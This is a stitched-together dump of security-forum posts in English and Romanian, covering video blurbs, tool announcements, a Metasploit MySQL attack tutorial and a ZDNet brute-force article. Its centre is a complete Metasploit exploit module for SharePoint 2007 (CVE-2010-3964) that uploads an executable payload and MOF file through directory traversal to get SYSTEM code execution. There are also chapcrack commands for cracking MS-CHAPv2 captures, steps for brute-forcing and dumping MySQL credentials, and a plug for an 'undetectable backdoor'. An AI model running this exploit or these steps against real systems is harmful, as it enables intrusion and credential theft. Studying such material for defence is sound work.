Wubi

Description: DRIL is a simple reverse domain tool, this tool is really useful for penetration testers to find out the domain names which are listed in the the target host. DRIL tool developed by Treasure Priyamal. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn step by step how to Decode Malicious Email Attachment. Sometimes we receive any random email so we clicked on it and after that you will see automatically that malicious script start sending fake masseges, so in this video learn how to decode that malicious email attachment and see, where the email came from. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

CacheToggle, Cookies Manager+, Firebug, fireencrypter, Fireforce, FireFTP, FireSSH, Flagfox, FoxyProxy Standard, Google Siste INdexer Greasemonkey, HttpFox, HttpRequester, JSView, Live HTTP headers, HackBar, Ra.2: DOM XSS Scanner, Proxy Tool, SQLite Manager, SQL Inject Me, Session Manager, Secure Or Not, XSS Me, DNS Flusher, Event Spy, NoScript, Scriptify, Web Developer, User Agent Switcher, Inspect Element, Wappalyzer, Websecurify. Mai sunt si altele. Ar fi o idee daca ai face si o tema marca RST. Ai putea sa creezi si un server de proxy care sa vina implicit cu browserul. Eventual ceva Bookmarks default, gen RSTCenter, RTFM, P-o-S.

chapcrack tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse relevant credentials from the handshake. The hash is inserted into chapcrack, and the entire network capture us decrypted. Alternatively, it can be used to login to the user’s VPN service or WPA2 Enterprise radius server. Moxie Marlinspike, the mind behind the Convergence SSL authenticity system, has presented at Defcon a tool that allows attackers to crack the MS-CHAPv2 authentication protocol, which is still used in many PPTP (Point-to-Point Tunneling Protocol) VPNs and WPA2 Enterprise environments. Four simple step to follow for using chapcrack Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance). Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap). Submit the CloudCracker token to www.cloudcracker.com Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n ) Download chapcrack: chapcrack – chapcrack.py Sursa: chapcrack a Tool for cracking MS-CHAPv2 — PenTestIT

http://www.youtube.com/watch?feature=player_embedded&v=wg9BEO9oXGc Description: Findmyhash is a python script which is used to crack the hashes .With findmyhash tool you can crack different types of hashes using free online services.Make sure you are connecting to a internet before using findmyhash tool. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Findmyhash decrypt tool on BackTrack 5 R2 - YouTube

Description: You can hack a remote victim utilizing the XSS vulnerabilities of a Web Application. For this purpose we the exploit "ms10_046_shortcut_icon_dllloader" available in Metasploit. The exploit will start a local server that can serve the victim the exploits. When the victim visit's that URL, he gets owned. In the background stuffs like exploiting WebDAV, DLL Injection, Exploiting LNK vulnerability etc. are happening. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn how to create undetectable backdoor using Python programming language. This backdoor totally avoids detection by almost every antivirus out there. How to setup python environment watch this video : - This video is all about How to Install & Config Python Programming Environment Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

.

Microsoft Office SharePoint Server 2007 Remote Code Execution [table=width: 500, class: grid] [tr] [td]EDB-ID: 20122[/td] [td]CVE: 2010-3964[/td] [td]OSVDB-ID: 69817[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-31[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize super( 'Name' => 'Microsoft Office SharePoint Server 2007 Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability found in SharePoint Server 2007 SP2. The software contains a directory traversal, that allows a remote attacker to write arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile request to the Office Document Conversions Launcher Service, which results in code execution under the context of 'SYSTEM'. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers. It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows 2003 SP2. }, 'Author' => [ 'Oleksandr Mirosh', # Vulnerability Discovery and PoC 'James Burton', # Vulnerability analysis published at "Entomology: A Case Study of Rare and Interesting Bugs" 'juan' # Metasploit module ], 'Platform' => 'win', 'References' => [ [ 'CVE', '2010-3964' ], [ 'OSVDB', '69817' ], [ 'BID', '45264' ], [ 'MSB', 'MS10-104' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-287/' ] ], 'Targets' => [ [ 'Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2', { } ], ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Dec 14 2010' ) register_options( [ Opt::RPORT(8082), OptInt.new('DEPTH', [true, "Levels to reach base directory",7]) ], self.class) end # Msf::Exploit::Remote::HttpClient is avoided because send_request_cgi doesn't get # the response maybe due to the 100 (Continue) status response even when the Expect # header isn't included in the request. def upload_file(file_name, contents) traversal = "..\\" * datastore['DEPTH'] soap_convert_file = "<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" " soap_convert_file << "xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" " soap_convert_file << "xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" " soap_convert_file << "xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_convert_file << "xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" " soap_convert_file << "SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" << "\x0d\x0a" soap_convert_file << "<SOAP-ENV:Body>" << "\x0d\x0a" soap_convert_file << "<i2:ConvertFile id=\"ref-1\" " soap_convert_file << "xmlns:i2=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface\">" << "\x0d\x0a" soap_convert_file << "<launcherUri id=\"ref-3\">http://#{rhost}:8082/HtmlTrLauncher</launcherUri>" << "\x0d\x0a" soap_convert_file << "<appExe id=\"ref-4\"></appExe>" << "\x0d\x0a" soap_convert_file << "<convertFrom id=\"ref-5\">#{traversal}#{file_name}</convertFrom>" << "\x0d\x0a" soap_convert_file << "<convertTo id=\"ref-6\">html</convertTo>" << "\x0d\x0a" soap_convert_file << "<fileBits href=\"#ref-7\"/>" << "\x0d\x0a" soap_convert_file << "<taskName id=\"ref-8\">brochure_to_html</taskName>" << "\x0d\x0a" soap_convert_file << "<configInfo id=\"ref-9\"></configInfo>" << "\x0d\x0a" soap_convert_file << "<timeout>20</timeout>" << "\x0d\x0a" soap_convert_file << "<fReturnFileBits>true</fReturnFileBits>" << "\x0d\x0a" soap_convert_file << "</i2:ConvertFile>" << "\x0d\x0a" soap_convert_file << "<SOAP-ENC:Array id=\"ref-7\" xsi:type=\"SOAP-ENC:base64\">#{Rex::Text.encode_base64(contents)}</SOAP-ENC:Array>" << "\x0d\x0a" soap_convert_file << "</SOAP-ENV:Body>" << "\x0d\x0a" soap_convert_file << "</SOAP-ENV:Envelope>" << "\x0d\x0a" http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a" http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a" http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a" http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a" http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a" http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a" http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a" connect sock.put(http_request << soap_convert_file) data = "" read_data = sock.get_once(-1, 1) while not read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end disconnect return data end # The check tries to create a test file in the root def check peer = "#{rhost}:#{rport}" filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit peer = "#{rhost}:#{rport}" # Setup the necessary files to do the wbemexec trick exe_name = rand_text_alpha(rand(10)+5) + '.exe' exe = generate_payload_exe mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/ print_good("#{peer} - #{exe_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{exe_name}") return end print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/ print_good("#{peer} - #{mof_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{mof_name}") return end end end

Ai dreptate in mare parte, dar nu poti tu ca pentester sa lasi de`o parte lucruri banale ca asta sa`ti scape, chiar daca serviciile prestate sunt pentru o companie ce se respecta sau nu. Scopul tutorialului a fost sa arate cea mai simpla metoda de a obtine acces intr`un server MySQL. Poate nu este foarte tehnic, si nu am detaliat prea mult, dar nu asta a fost scopul. Multumesc pentru sugestie, voi face tutoriale mult mai detaliate, in care sa explic pe larg, ce, cum, si de ce am facut asa. Multumesc si pentru acea atentionare cu imaginea.

MySQL este una dintre cele mai folosite baze de date, folosita de foarte multe aplicatii in zilele noastre. In pentesting, este aproape imposibil sa nu gasesti un sistem ce ruleaza un server MySQL. In topicul asta vom vedea cum sa atacam o baza de date MySQL cu ajutorul framework-ului Metasploit. Sa presupunem ca scopul nostru este sa testam serverul MySQL. Primul pas este sa edscoperim versiunea bazei de date. Framework-ul Metasploit are un modul ce ne permite sa gasim versiunea unei baze de date. Cunoscand versiunea, ne va ajuta sa descoperim posibilele vulnerabilitati. Singurul lucru pe care il avem de facut este sa punem adresa IP si sa folosim commanda run. Acum putem folosi modulul mysql_login in combinatie cu wordlist-ul nostru pentru a descoperi cel putin un cont valid ce ne va permite sa ne conectam la baza de date MySQL. Mereu ca pentester este bine sa verifici baza de date de conturi sau parole slabe. Scannerul a dat rezultate, dupa cum putem vedea din rezultate, avem un cont valid, (root) Inainte sa folosim acest cont, in scopul de a ne conecta si interactiona direct cu baza de date, putem folosi alte doua module metasploit, ce ne pot ajuta sa enumeram conturile din baza de date si sa extragem contul si parola criptata din serverul MySQL. Desigur, asta se poate face manual, insa Metasploit ne ajuta sa facem asta. Deci prima data, vom configura modulul numit msql_enum in scopul de a gasi informatii despre conturile bazei de date. Urmatorul pas este sa configuram si sa rulam modulul mysql_hashdump in scopul extragerii hash-urilor parolelor de la toate conturile din database. Acum ne putem conecta la serverul mysql. Backtrack are deja un client deci putem folosi comanda, mysql -h IP -u username -ppassword. In cazul nostru IP-ul tintei este chiar IP-ul meu. Acesta apare cu blur in imagini, la fel si parola mysql. Acum ca suntem conectati la baza de date putem folosi comanda show databases; in scopul descoperirii bazelor de date stocate in serverul MySQL. Urmatorul pas este sa alegem o baza de date si apoi sa incercam sa vedem tabelele din care va urma sa incepem sa extragem date. Putem face asta folosind comanda use <dbname>; si comanda show tables; Putem vedea ca acolo este un tabel numit 'user'. Vom vrea sa extragem datele ce contin conturi si parole din ystem. Putem face asta folosind comanda select User, Password from user; Dupa cum putem vedea acolo sunt 5 conturi cu parole criptate. Deci acum avem toate conturile bazei de date MySQL. Putem acum descoperi tabele aditionale din alte baze de date cu comanda show tables from <dbname>; Astfel de metode se folosesc pentru a extrage tot felul de baze de date. Concluzie In acest topic am aratat cum sa obti acces intr`un server MySQL obtinand acces folosindune de username si parole slabe sau default. Multe companii au astfel de probleme de securitate. Orice pentester trebuie sa verifice inainte de a evalua un sistem de baze de date, daca acesta nu foloseste parole slabe sau implicite. Asta este cea mai usoara cale de a obtine acces. Referinte Penetration Testing Lab Metasploit Penetration Testing Software | Metasploit Framework | Metasploit Project BackTrack Linux - Penetration Testing Distribution

Wow! This sure has taken us by surprise! We thought the Pentoo was long dead, but it has proved us wrong and has literally risen from the ashes! We now have a 64-bit Pentoo 2012.0 Defcon Release amongst us and our very initial posting about Pentoo. Changes made to Pentoo: New “pentoo” profiles which allow you to use hardened or not at your choice (who wants to be soft?) Full GPU cracking support for both cuda and opencl on both AMD/ATI and nVIDIA hardware including but not limited to pyrit, JohnTheRipper, oclhashcat-plus, oclhashcat-lite Shiny 3.4.2 kernel (hardened or not) Full support for the ubertooth hardware (also added to kismet and wireshark) New radio category for sdr hacking for things like the rtl-sdr and Ettus USRP devices. 64 bit version (32 bit is a low priority until after the beta starts, sorry if your hardware is that old/crappy) Again, this is the short list of changes. The real changelog and planned features are mostly hiding in over 3000 commits in their SVN. Things which we can look forward to in the forthcoming releases are full ARM support and Openbts! But, as of now, we only have a 64-bit release! Should BackTrack watch out? Time will only tell. Download Pentoo: Pentoo 2012.0 Defcon Beta - pentoo-x86_64-2012.0_betazero.iso Sursa: Pentoo 2012.0 Defcon Beta! — PenTestIT

Diviner comes to us from the author of the recently released Security Tools benchmark – Shay Chen – that helps you to gain an insight into the server-side source code and memory structure of any application, using black box techniques and without relying on any security exposures! It tries to introduce a crossbreed between automated testing and human deduction, provide an alternate (or complementary) route via techniques such as source code fingerprinting, and memory structure divination and cross entry-point effects. Diviner is an open source, active information gathering platform, built as an extension for OWASP Zed Attack Proxy (ZAP), and aimed to enhance the tester’s decision making process. It is is a unique platform that attempts to predict the structure of the server-side memory, source code and processes, by executing scenarios aimed to fingerprint behaviors that derive from specific lines of code, processes or memory allocations, by employing the use of a variety of coverage processes, content differentiation tests and entry point execution scenarios, and by using deduction algorithms that convert this information into a visual map of the application. This information is also presented in the form of leads, that can help testers locate complex vulnerabilities, the same way they locate vulnerabilities that are considered low hanging fruit. Features offered by Diviner: Analysis Features: Detect Input Reflections (Potential XSS, CRLF Injection, Etc) Detect Error-Generating Scenarios (Potential Injections) Detect Content Differentiation Effects (Direct & Indirect Effect of Input) Coverage Features: Reuse the Content in ZAP’s History Domain Restrictions URL Exclusion Deduction Processes: Convert Behaviors into Pseudo-code Representation of Server-Side Code Predict the Structure of the Server Side Memory (Session / DB / Etc) Isolate and Present a Map of the Server-Side Processes Specific Payload Recommendations Barrier Support: Authentication Support Anti-CSRF Token Support Resend Updated Values of Required Parameters (VIEWSTATE, Etc) Replay Relevant History Prior To Resending Requests Built-in Plugins: A Customized Manual Penetration Test Payload Manager Integration Features: Integration With ZAP’s ‘Resend Request’ Feature Diviner can already illustrate server side behaviors and processes, contains features such as the task list/advisor which provide invaluable leads to potential exposures, present a partial map of the server side memory, and present a partial representation of the server side code. Since Diviner attempts to identify behaviors that result from valid & invalid scenarios, and can’t guess what is valid on its own, it must be used after a short manual crawling process that covers the important application sections with valid values. Clearly, the ZAP extension does not perform any form of automated vulnerability scanning, but plans on exporting the interesting leads to a format that can be used by external scanners to detect exposures in these abnormal scenarios are in the works. The Diviner extension is deployed using a Windows installer (or in binary format for other operating systems), and requires Java 1.7.x and OWASP ZAP 1.4.0.1 in order to run properly. Download Diviner: Diviner v1.0.1 – Diviner-v1.0.1beta.exe/diviner-1.0.1beta-src.zip Sursa: PenTestIT — Your source for Information Security Related information!

http://www.youtube.com/watch?feature=player_embedded&v=bFb5opZZpkk Description: Cupp is a common user password profiler. Using this script we can make our own dictionary on someone profiling such as a birthday, nickname, address, name of a pet or relative, or some common works like god, love, money, or any different passwords. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Cupp wordlist maker tool on BackTrack 5 R2 - YouTube

Xelenium is the solution that is developed using the Selenium apis’ and that helps us in identifying the reflected XSS (cross site scripting) infected fields in a web application. This solution is developed using Java swing and thread concepts, and the solution is flexible such that user can customize the attack vectors that attack the application. What is Xelenium Xelenium is a security testing tool that can be used to identify the security vulnerabilities present in the web application. Xelenium uses the open source functional test automation tool ‘Selenium’ as its engine and has been built using Java swing. Xelenium has been designed considering that it should obtain very few inputs from users in the process of discovering the bugs. Current version helps the user in identifying the Cross Site Scripting (XSS) threats present in the web application. In the subsequent versions, Xelenium will be enhanced such that it could identify the other leading threats. There are some issues while running the tool and hope auther is aware of this. Hope soon it will be fixed. Download Xelenium: Xelenium – Xelenium.jar Sursa: Xelenium a Security Testing with Selenium — PenTestIT

Description: This and more videos in: Blog de Omar Follow me in Facebook: El Palomo | Facebook Follow me in Twitter: @ElPalomo_Blog This video shows: Analysis of configuration files: XML files Analysis of BD files: history messages, transfer files, list of contacts Conclusions and recommendations Spanish video version: Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Cuckoo eats Win32.FakeAV Description: In this video you will learn how to analyze a fake Antivirus software using SandBox tool and how attacker selling their fake software and stealing our information for profit. In this video he is using a tool called Cuckoo SandBox. The cuckoo is open source automated malware analysis system. Cuckoo generates a handful of different raw data which include: Native functions and Windows API call traces Copies of files created and deleted from the file system Dump of the memory of the selected process Screenshots of the desktop during the execution of the malware analysis Network dump generated by the machine used for the analysis Source : - Automated Malware Analysis | Cuckoo Sandbox Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Cuckoo eats Win32.FakeAV on Vimeo

Cuckoo Sandbox 0.4 against a Flash Player exploit Description: In this video demo Claudio G. Analyzing a rogue PDF document exploiting a Flash Player vulnerability. Vulnerability Code (CVE-2011-0611). In this video he is using tool called Cuckoo SandBox. Cuckoo is open source automated malware analysis system. uckoo generates a handful of different raw data which include: Native functions and Windows API calls traces Copies of files created and deleted from the filesystem Dump of the memory of the selected process Screenshots of the desktop during the execution of the malware analysis Network dump generated by the machine used for the analysis Source : - Automated Malware Analysis | Cuckoo Sandbox Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Cuckoo Sandbox 0.4 against a Flash Player exploit on Vimeo

http://www.youtube.com/watch?v=TU9dfLCuu6U&feature=player_embedded Description: WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Whatweb tool on BackTrack 5 R2 - YouTube

Post BlackHat USA, a lot of new tools that we were waiting for were finally released! First in line is the Smartphone Pentest Framework by Ms. Georgia Weidman! This open source tool was built out of the need of having a way to test the security of the frighteningly workplace intrusive smart phones that have unique attack vectors currently not covered by available industry tools. Mind you, this is not like just running Nmap from your smartphone. So, the Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphone’s deployed in an environment and is a product of DARPA Cyber Fast Track grant. The SPF allows you to understand the security posture of the smartphones in an organizations just as we would in a normal world penetration test – gather information/social engineering, launch exploits and maintain control post exploitation. The current Smartphone Pentest Framework contains remote attacks (via HTTP or SMS), client side attacks (via malicious webpages, PDFs etc.), social engineering attacks, and post exploitation, targeting smartphone devices. Smartphone Pentest Framework includes the following: SPF Console: The console is a text based Perl program that allows Smartphone Pentest Framework users to perform all the server functionality of SPF. SPF Web based GUI: The GUI is a web based front end for SPF that allows users to perform all the server functionality. It is a set of Perl based webpages. SPF Android App: The SPF Android App allows users to use the mobile modem of the Android smartphone with SPF to send SMS messages, gather information, etc. Users can also perform server functionality directly from Android smartphones using this application. SPF Android Agent: The SPF Android Agent is one of Smartphone Pentest Framework’s post exploitation options. It is transparent to the user and allows SPF users to perform post exploitation tasks such as privilege escalation, information gathering, and remote control on Android phones with the agent installed. Agents for iPhone and Blackberry platforms are currently in development. The above components may be mixed and matched to meet users’ needs, making this framework very versatile. Prerequisites for the Smartphone Pentest Framework (though very few) are: a Webserver, a Mysql database, Perl with packages - Bundle::Expect & DBD::MYSQL and an Android phone. Download the Smartphone Pentest Framework – SPF v0.1 Sursa: Smartphone Pentest Framework (SPF)! — PenTestIT

Our first post regarding Smooth-Sec can be found here. A few hours ago an update for the 64-bit Smooth-Sec version 2.0 was released! This new version brings substantial improvements in term of high performances with the adoption of 64bit Debian gnu-Linux operating system. Smooth-Sec 64bit official change log: Operating system: Debian 6.0 squeeze 64-bit IDS: Suricata 1.3 stable WEB Console: Snorby 2.5.1 Database: MariaDB 5.5.25 Log interpreter: Barnyard2 2.1.10-beta2 Web framework: nginx/0.8.54 – passenger-3.0.4 Download Smooth-Sec: Smooth-Sec 2.0 64-bit – SmoothSec-2.0-amd64.iso Sursa: Smooth-Sec 64-bit version 2.0! — PenTestIT

Cucusoft Net Guard is a free software to monitor your broadband usage, speed up your Internet speed, kill malware who are wasting your bandwidth, provide you a monthly detail Bandwidth Usage report. On the market, this kind of software is sold for $30 or higher and even has fewer features. But this once free right now so grab it!!! Cucusoft Net Guard includes powerful Bandwidth monitor and Bandwidth meter to help you find who is wasting your bandwidth. As you know, sometime, you didn’t visit internet, but there are still some unknown software using your Broadband in your computer. Normally, you have no idea about them, don’t know who they are, how to monitor them, how to kill the useless program which is biting your bandwidth. Those unknown programs sometime even affect your normal Internet surfing speed a lot and you have to pay the Broadband Bill for them. Cucusoft Net Guard can help you fix these problems. It can easily to monitor your broadband status, to find who are using your broadband, how much bandwidth they are using, and more details statistics available, you can make decision by yourself after checking the simple report, keep it or kill it. Cucusoft Net Guard five tabs information : Cucusoft Net Guard displays the bandwidth usage over time, as well as how much of a month’s bandwidth limit you have already used up. You can define Internet limits in the program settings. The graph can display bandwidth usage by week, month or year. Cucusoft Net Guard monitor displays all processes and services that are or have used the Internet connection in one way or the other. Each program is listed with its name, the current upload and download speed, as well as the traffic that it has accumulated in the current session. A right-click on a program displays options to kill the process directly. Connections displays a list of ports that are currently open on the computer. Speed test runs a benchmark that is used to determine the computer’s download speed. It is fairly limited in comparison to other services such as Speed Test, Down Tester, Internet Auto Speed Tester or Speed.io. Statement displays a computer’s bandwidth usage in a pdf report. Download Cucusoft Net Guard: Cucusoft Net Guard – netguard.exe Sursa: Cucusoft Net Guard is a monitor broadband usage easily. — PenTestIT

Update: Au fost lansate doua teme noi, PoS si Wubi. Temele sunt Vista Like. Le puteti gasi in Start>System Preferences (Control Panel pentru utilizatorii noi)>Looks & Feel>Theme. Acestea au fost facute publice, insa vor mai suferi modificari. Preview Wubi: Preview PoS: Update2: Aplicatia Radio RST a fost refacuta.

VictorPonta.ro sa fie urmatorul?

Brute Force Attacks: Beyond password basics | ZDNet Summary: So you have a strong password. Is that enough? The psychology of password creation would suggest we are not necessarily safe from Brute Force Attacks. By Gery Menegaz for Five Nines: The Next Gen Datacenter | July 27, 2012 -- 19:22 GMT (12:22 PDT) So you have a strong password. Is that enough? The psychology of password creation would suggest we are not necessarily safe from Brute Force Attacks. “Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords”, according to Brandon Smith, writing as James Penguin for 2600. Many of us know the basics, or what passes for common sense with regard to workstation security. You know…use anti-virus software, and make certain that the definitions file is up to date. Make certain that your OS is equally patched. Don’t download software from questionable sites. With regard to passwords, it’s simple: don’t use passwords that may be found in a dictionary. For enterprise, and more security conscious web sites implement password policies that mandate the use of numbers, letters and, sometimes, special characters. Is this enough? With the recent publication of hundreds of thousands of usernames and associated passwords, it appears that common sense is in fact, not very common. The recent Yahoo! Email hack revealed that ‘123456’ was used as the password for 1,666 users. Believe it or not ‘password’ was used by 780 users. Please! Once hackers are able to infiltrate a site, they make their way to the list of usernames and passwords. A file that is typically encrypted or ‘hashed’ using MD5 (Message-Digest Algorithm is a widely used cryptographic hash function). Hackers will then try to generate hashes through brute force, and compare the data from the stolen file to the newly created hash file. This is how, after a breach, they are able to post all of the passwords online. A quick distinction: a Dictionary Attack is where a hacker will use a dictionary file to iterate through every possible word to produce a hash file which can then be used to compare to the target hash. Dictionary files can be downloaded from a number of places such as the Pirate Bay, so it’s something that script kiddies can use. Dictionary attack works well on single word passwords, but fail on more complex passwords such as those required in most mature organizations. Brute force attacks are different in that they will cycle through every possible combination of characters (e.g., aaaaaaa, aaaaaab, aaaaaac, aaaaaad, etc.), rather than employing a dictionary list. While very effective, given enough time, brute force attacks will typically waste a lot of cycles trying to crack a hash from nonsense letter combinations like: ddddddd jhakdsj asdasda [table=width: 500, class: grid] [tr] [td]Number of Letters[/td] [td]Possible Combinations[/td] [/tr] [tr] [td]1[/td] [td]26[/td] [/tr] [tr] [td]2[/td] [td]1,352[/td] [/tr] [tr] [td]3[/td] [td]52,728[/td] [/tr] [tr] [td]4[/td] [td]1,827,904[/td] [/tr] [tr] [td]5[/td] [td]59,406,880[/td] [/tr] [tr] [td]6[/td] [td]1,853,494,656[/td] [/tr] [tr] [td]7[/td] [td]56,222,671,232[/td] [/tr] [/table] Passwords that resemble line noise are only generated by the most paranoid of users. Most people will generate words or phrases that they can easily remember. This means that they will follow some basic word construction rules in the creation of their password/passphrase. For example, how many of you, use English like words or word combinations? use hyphens and underscores between words? use ending punctuation, appropriately, at the end of a password or passphrase? Replace vowels with numbers such as: 4 = A, 3= E, 0 = O, etc? By understanding some basic morphology, hackers have the ability to move beyond basic brute force attacks and employ smarter algorithms. Considerations include the uses of an apostrophe, hyphens, underscores, suffixes, vowels, and character repetition patterns, according to Smith. Apostrophe Use Here we are expecting one apostrophe followed by an ‘s’, and positioned at the last or second to last character. For the algorithm we are not concerned with the apostrophe to show a contraction, only possession and plural possession. Hyphens and Underscores The rule here is that these are use independently for the separation of two unique constructions; then each word is tested separately. Ending Punctuation Ending punctuation (! ? . , ) is expected to be at the end of the password, and we would not expect to see more than one punctuation character. Any other ending punctuation is not accepted. Suffixes Accepted suffixes include –able, -ac, -acity, -age, etc. Here is a comprehensive Suffix Worksheet. The rule here is that the last letter before the suffix cannot be the same as the first letter of the suffix. The rule does not allow for repeating vowels. Vowels The word needs to contain at least one vowel. Employing Character Position Analysis, analyzing a character’s position in relation to its neighbors, allows a hacker to know if the characters fit next to each other. There are three tests involved as well as methods for getting more accurate results, as well as how to deal with more complex characters. This heuristic appraoch allows hackers to crack long and complicated passwords quicker. How do we defend against this approach? Well, if you really value your privacy, you best understand how hackers use brute force attacks to translate a hash into your password, and create passwords of sufficient complexity that will defeat their brute force attacks. Is your organization practicing password common sense? Talk Back and let me know. Sursa: Brute Force Attacks: Beyond password basics | ZDNet